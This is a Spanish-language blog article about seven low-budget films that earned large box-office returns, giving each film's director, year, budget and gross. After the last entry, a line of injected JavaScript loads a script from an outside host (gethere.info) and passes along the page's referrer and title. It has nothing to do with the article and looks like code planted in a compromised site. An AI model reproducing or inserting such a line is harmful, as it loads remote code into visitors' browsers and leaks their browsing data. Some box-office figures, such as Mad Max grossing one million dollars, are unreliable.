7 películas de bajo presupuesto que hicieron mucha ganancia

Por: Axel Sarquis

¿Se puede hacer algo de calidad con poco presupuesto?

Para realizar una película se necesita un presupuesto que logre cubrir el proyecto audiovisual. Dicho presupuesto es muy abundante para las películas que vemos hoy en día en la pantalla grande, peo, existen películas que han logrado maravillas con poco dinero. Es importante tener en mente que el objetivo de la película es contarnos una historia, una idea que entretenga a la audiencia y si se puede, que esta audiencia se lleve un mensaje a casa. Este objetivo se puede lograr contando bien la historia con un lenguaje cinematográfico bien empleado, no necesariamente con millones dólares, aunque el dinero sí genera un espectáculo visual mayor (en el ámbito de los efectos especiales).

Aquí te dejamos 7 grandes películas de bajo presupuesto.

Halloween

Director: John Carpenter

Año: 1978


Una película que todos recordaremos toda la vida, siendo una de los clásicos de terror de toda la historia. Esta película fue todo un éxito y lo seguirá siendo con el pasar de los años. La película tenía un presupuesto de $320 mil dólares y recaudo más de 50 millones de dólares. Se utilizaron locaciones de bajo presupuesto y vestuarios improvisados durante la grabación que solo duro 21 días. Todo un reto.

El Mariachi

Año: 1992

Director: Robert Rodríguez


Un film considerado de culto para muchas personas, creando una película muy divertida con un presupuesto de $7,000 dólares y recaudando $2, 041,928 de dólares. Se rumoraba que el director no contaba con la costosa Steady Cam y utilizó una silla de ruedas para ciertas escenas. Eso es ahorrar al extremo, pidiéndole a sus actores que se detuvieran en ciertas tomas para cambiar de lugar, debido a que se grabó con una sola cámara.

La noche de los muertos vivientes.

Año: 1968

Director: George A. Romero


No solo hablamos de una película de culto, estamos hablando de un film que revoluciono un género del terror en la historia del cine. Una película que se grabó con un presupuesto de $114,000 dólares y recaudo más de 30 millones de dólares, recuperando más de 263 veces su inversión.

Psicosis

Año: 1960

Director: Alfred Hitchcock


Uno de los maestros en la historia del séptimo arte logró realizar esta obra con $850,000 dólares y sólo en 30 días recaudó más de $40 millones de dólares. Estamos hablando del maestro Hitchcock, difícilmente alguien contaba historias como él.

Mad Max

Año: 1979

Director: George Miller


Una película de culto para todos, con la participación del Mel Gibson antes de que fuera la estrella que es ahora. Hablamos de una producción de $300,000 dólares que recaudó en taquilla un millón de dólares, logrando una recaudación bastante generosa. George Miller se ha convertido en uno de los directores más conocidos alrededor de los años y nos sorprendió con su última película de Mad Max, logrando uno de los mejores espectáculos visuales que hemos visto.

Rocky

Año: 1976

Director: John G. Avildsen

Video

Antes de que Sylvester Stallone fuera tan conocido, realizó esta película que lo llevó a la cima. Este film se realizó con una producción poco menor a un millón de dólares y recaudó más de $220 millones de dólares de su inversión. Recordemos que fue premiada como mejor película y mejor director en su año por la academia.

Actividad Paranormal

Año: 2007

Director: Oren Peli

Así es, no necesitas los millones para realizar un film de terror. Estamos hablando de una película que la verdad no es tan buena pero recaudó 12, 890 veces su inversión. Un film que sólo costó $15,000 dólares y recaudó un poco menos de $200 millones de dólares. Aunque no lo crean, estamos igual de impresionados.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios